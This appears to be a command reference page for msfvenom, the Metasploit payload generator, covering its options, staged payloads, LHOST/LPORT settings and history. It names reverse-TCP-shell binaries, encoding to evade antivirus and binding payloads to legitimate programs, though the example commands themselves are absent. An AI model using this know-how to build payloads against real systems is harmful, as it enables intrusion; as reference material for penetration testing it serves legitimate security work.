msfvenom
Generate Metasploit payloads
TLDR
List payloads
List formats
Show payload options
Create an ELF binary with a reverse TCP handler
Create an EXE binary with a reverse TCP handler
Create a raw Bash with a reverse TCP handler
SYNOPSIS
msfvenom [options]
PARAMETERS
-p, --payload
Selects the payload to generate.
-l, --list [module_type]
Lists available modules of a specific type (payloads, encoders, etc.). If no type is given, lists all module types.
-n, --nopsled
Prepends a NOP sled of specified length to the payload.
-f, --format
Specifies the output format (e.g., raw, exe, elf, dll, etc.).
-e, --encoder
Specifies the encoder to use for obfuscation.
-a, --arch
Specifies the target architecture.
-o, --out
Saves the generated payload to the specified file path.
-s, --space
The maximum size of the resulting payload.
-b, --bad-chars
Specifies bad characters to avoid in the payload.
-i, --iterations
Number of encoding iterations.
--platform
Payload platform
-v, --var-name
Specifies a custom variable name for the generated payload.
-x, --template
Specifies a custom executable template to use.
-k, --keep
Preserves the template functionality when using -x.
-h, --help
Displays help information.
DESCRIPTION
msfvenom is a command-line instance of Metasploit used to generate payloads. It is a combination of msfpayload and msfencode from earlier versions of Metasploit. It allows for creation of custom payloads (shellcode) for various operating systems and architectures, and offers encoding and obfuscation techniques to evade antivirus detection.
It's a versatile tool for penetration testers and security researchers to build payloads, bind payloads to legitimate applications, create executables, and more. It simplifies the process of payload creation by providing a single interface for generating, encoding, and outputting payloads in various formats. msfvenom supports numerous platforms, architectures, and payload types, making it a critical tool for creating custom payloads for exploitation.
CAVEATS
Payloads generated with msfvenom can be detected by antivirus software. Effective evasion requires careful selection of encoders, bad characters, and obfuscation techniques. Using pre-made payloads without understanding their function can be risky. Some options may not be compatible with all payloads or formats.
UNDERSTANDING PAYLOAD STAGES
Many payloads utilize a 'staged' approach. The initial payload is small and downloads a larger, more complex payload (the 'stage'). This allows for smaller initial payloads that can bypass certain restrictions and then load more advanced functionality. msfvenom allows to create the stager and the stage.
CUSTOMIZING PAYLOADS
msfvenom provides numerous options to customize payloads, including setting LHOST (listening host), LPORT (listening port), and other payload-specific options. Understanding these options is crucial for creating effective payloads for specific target environments. Use -o to write results into a file with specified name.
HISTORY
msfvenom was introduced as a replacement for the separate msfpayload and msfencode tools in Metasploit. This change was made to streamline the payload generation process and improve the user experience.
Its development focused on consolidating payload generation and encoding functionality into a single, unified tool. msfvenom aimed to simplify payload creation and manipulation, making it easier for security professionals to generate and customize payloads for various penetration testing and security research tasks. Over time, it has been expanded with new features, payloads, encoders, and output formats.
SEE ALSO
msfconsole(1)